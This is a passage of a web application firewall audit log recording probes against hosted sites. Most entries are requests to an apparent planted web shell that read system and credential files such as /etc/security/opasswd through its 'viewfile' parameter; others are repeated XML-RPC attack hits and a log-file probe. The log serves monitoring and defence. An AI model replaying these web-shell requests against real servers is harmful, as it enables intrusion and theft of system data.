aFBwxRwcFb_n1P0IC9xrVwAAAAo 216.73.216.71 58878 127.0.0.1 7081 --9769d93b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Fstat HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9769d93b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3156 Connection: close Content-Type: text/html; charset=UTF-8 --9769d93b-H-- Message: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/root/proc/self/stat"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/root/proc/self/stat"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBwxRwcFb_n1P0IC9xrVwAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102213811187 4224 (- - -) Stopwatch2: 1750102213811187 4224; combined=2234, p1=329, p2=1775, p3=37, p4=34, p5=59, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9769d93b-Z-- --33c06816-A-- [17/Jun/2025:01:00:53.629447 +0530] aFBw7cl682-knofG8qdWtgAAAAM 216.73.216.71 54600 127.0.0.1 7081 --33c06816-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fdhcp&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fdhcp%2Fdhclient.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --33c06816-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3755 Connection: close Content-Type: text/html; charset=UTF-8 --33c06816-H-- Message: Warning. Matched phrase "etc/dhcp/dhclient.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/dhcp/dhclient.conf found within ARGS:viewfile: /proc/self/root/etc/dhcp/dhclient.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/dhcp/dhclient.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/dhcp/dhclient.conf found within ARGS:viewfile: /proc/self/root/etc/dhcp/dhclient.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBw7cl682-knofG8qdWtgAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102253625262 4241 (- - -) Stopwatch2: 1750102253625262 4241; combined=2287, p1=314, p2=1847, p3=35, p4=35, p5=56, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33c06816-Z-- --646b9702-A-- [17/Jun/2025:01:00:54.903107 +0530] aFBw7h6Azi2u_ik2Q3KvLQAAAAY 216.73.216.71 54818 127.0.0.1 7081 --646b9702-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity%2Fopasswd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --646b9702-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2993 Connection: close Content-Type: text/html; charset=UTF-8 --646b9702-H-- Message: Warning. Matched phrase "etc/security/opasswd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/opasswd found within ARGS:viewfile: /snap/core20/2599/etc/security/opasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/opasswd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/opasswd found within ARGS:viewfile: /snap/core20/2599/etc/security/opasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBw7h6Azi2u_ik2Q3KvLQAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102254899022 4141 (- - -) Stopwatch2: 1750102254899022 4141; combined=2331, p1=356, p2=1848, p3=37, p4=34, p5=56, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --646b9702-Z-- --0b7ea43b-A-- [17/Jun/2025:01:01:03.794366 +0530] aFBw95lL5_2Zd8wUdfLPCgAAAAg 34.68.37.79 60848 127.0.0.1 7081 --0b7ea43b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --0b7ea43b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0b7ea43b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (84+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (84+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBw95lL5_2Zd8wUdfLPCgAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102263134400 660021 (- - -) Stopwatch2: 1750102263134400 660021; combined=2032, p1=330, p2=1312, p3=42, p4=80, p5=165, sr=88, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0b7ea43b-Z-- --63717924-A-- [17/Jun/2025:01:01:05.205654 +0530] aFBw-X3hoSwVUy254pH6TQAAACQ 216.73.216.71 32920 127.0.0.1 7081 --63717924-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Fstatm HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --63717924-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2995 Connection: close Content-Type: text/html; charset=UTF-8 --63717924-H-- Message: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/root/proc/self/statm"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/root/proc/self/statm"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBw-X3hoSwVUy254pH6TQAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102265201782 3926 (- - -) Stopwatch2: 1750102265201782 3926; combined=2087, p1=355, p2=1605, p3=35, p4=32, p5=60, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --63717924-Z-- --46dbf55a-A-- [17/Jun/2025:01:02:04.184105 +0530] aFBxM8l682-knofG8qdXBgAAAAM 34.68.37.79 43344 127.0.0.1 7081 --46dbf55a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 500 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --46dbf55a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --46dbf55a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBxM8l682-knofG8qdXBgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102323526771 657392 (- - -) Stopwatch2: 1750102323526771 657392; combined=2751, p1=483, p2=1856, p3=45, p4=60, p5=202, sr=123, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --46dbf55a-Z-- --d510594a-A-- [17/Jun/2025:01:02:52.111086 +0530] aFBxZBwcFb_n1P0IC9xr2AAAAAo 216.73.216.71 43248 127.0.0.1 7081 --d510594a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Fstatus HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d510594a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3507 Connection: close Content-Type: text/html; charset=UTF-8 --d510594a-H-- Message: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/root/proc/self/status"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/root/proc/self/status"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBxZBwcFb_n1P0IC9xr2AAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102372106635 4508 (- - -) Stopwatch2: 1750102372106635 4508; combined=2463, p1=370, p2=1941, p3=40, p4=37, p5=74, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d510594a-Z-- --32483c2a-A-- [17/Jun/2025:01:02:57.937317 +0530] aFBxaR6Azi2u_ik2Q3KvoQAAAAY 216.73.216.71 43978 127.0.0.1 7081 --32483c2a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fdefault%2Fgrub.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --32483c2a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3266 Connection: close Content-Type: text/html; charset=UTF-8 --32483c2a-H-- Message: Warning. Matched phrase "etc/default/grub" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:path: /proc/self/root/etc/default/grub.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/default/grub" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:path: /proc/self/root/etc/default/grub.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBxaR6Azi2u_ik2Q3KvoQAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102377932875 4495 (- - -) Stopwatch2: 1750102377932875 4495; combined=2488, p1=335, p2=1980, p3=53, p4=28, p5=92, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --32483c2a-Z-- --8bc8cc77-A-- [17/Jun/2025:01:03:03.943211 +0530] aFBxb0cTB7P_sALtclDv6wAAAAI 34.68.37.79 52916 127.0.0.1 7081 --8bc8cc77-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --8bc8cc77-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --8bc8cc77-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (85+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (85+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBxb0cTB7P_sALtclDv6wAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102383297430 645857 (- - -) Stopwatch2: 1750102383297430 645857; combined=2292, p1=343, p2=1447, p3=59, p4=77, p5=233, sr=93, sw=133, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8bc8cc77-Z-- --4b2e6a45-A-- [17/Jun/2025:01:03:47.417870 +0530] aFBxm1JfblPUQiSn5r1oPgAAAAA 216.73.216.71 37522 127.0.0.1 7081 --4b2e6a45-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fdhcp&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fdhcp%2Fdhclient.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --4b2e6a45-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3759 Connection: close Content-Type: text/html; charset=UTF-8 --4b2e6a45-H-- Message: Warning. Matched phrase "etc/dhcp/dhclient.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/dhcp/dhclient.conf found within ARGS:viewfile: /snap/core20/2599/etc/dhcp/dhclient.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/dhcp/dhclient.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/dhcp/dhclient.conf found within ARGS:viewfile: /snap/core20/2599/etc/dhcp/dhclient.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBxm1JfblPUQiSn5r1oPgAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750102427413613 4322 (- - -) Stopwatch2: 1750102427413613 4322; combined=2202, p1=325, p2=1727, p3=35, p4=44, p5=71, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4b2e6a45-Z-- --a41b3d59-A-- [17/Jun/2025:01:04:04.153131 +0530] aFBxq03CmevS3xeTzmop8AAAAAQ 34.68.37.79 36868 127.0.0.1 7081 --a41b3d59-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a41b3d59-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a41b3d59-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (87+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBxq03CmevS3xeTzmop8AAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102443512888 640302 (- - -) Stopwatch2: 1750102443512888 640302; combined=2499, p1=431, p2=1611, p3=54, p4=80, p5=200, sr=118, sw=123, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a41b3d59-Z-- --98dc5417-A-- [17/Jun/2025:01:05:04.072379 +0530] aFBx533hoSwVUy254pH7LAAAACQ 34.68.37.79 55270 127.0.0.1 7081 --98dc5417-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --98dc5417-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --98dc5417-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (86+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBx533hoSwVUy254pH7LAAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102503397055 675407 (- - -) Stopwatch2: 1750102503397055 675407; combined=2928, p1=487, p2=1981, p3=47, p4=67, p5=212, sr=136, sw=134, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98dc5417-Z-- --60145160-A-- [17/Jun/2025:01:05:09.980851 +0530] aFBx7B6Azi2u_ik2Q3KwEQAAAAY 74.81.40.26 55434 127.0.0.1 7081 --60145160-B-- GET /system/logs/error.log HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 74.81.40.26 X-Accel-Internal: /internal-nginx-static-location Connection: close Cache-Control: no-cache Pragma: no-cache Accept: */*, User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html) --60145160-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --60145160-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.csquaretech.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.csquaretech.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.csquaretech.com"] [uri "/system/logs/error.log"] [unique_id "aFBx7B6Azi2u_ik2Q3KwEQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750102508707577 1273343 (- - -) Stopwatch2: 1750102508707577 1273343; combined=1917, p1=317, p2=1489, p3=0, p4=0, p5=110, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --60145160-Z-- --aebf9772-A-- [17/Jun/2025:01:05:37.346968 +0530] aFByCUcTB7P_sALtclDwZAAAAAI 216.73.216.71 38158 127.0.0.1 7081 --aebf9772-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fsecurity%2Faccess.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 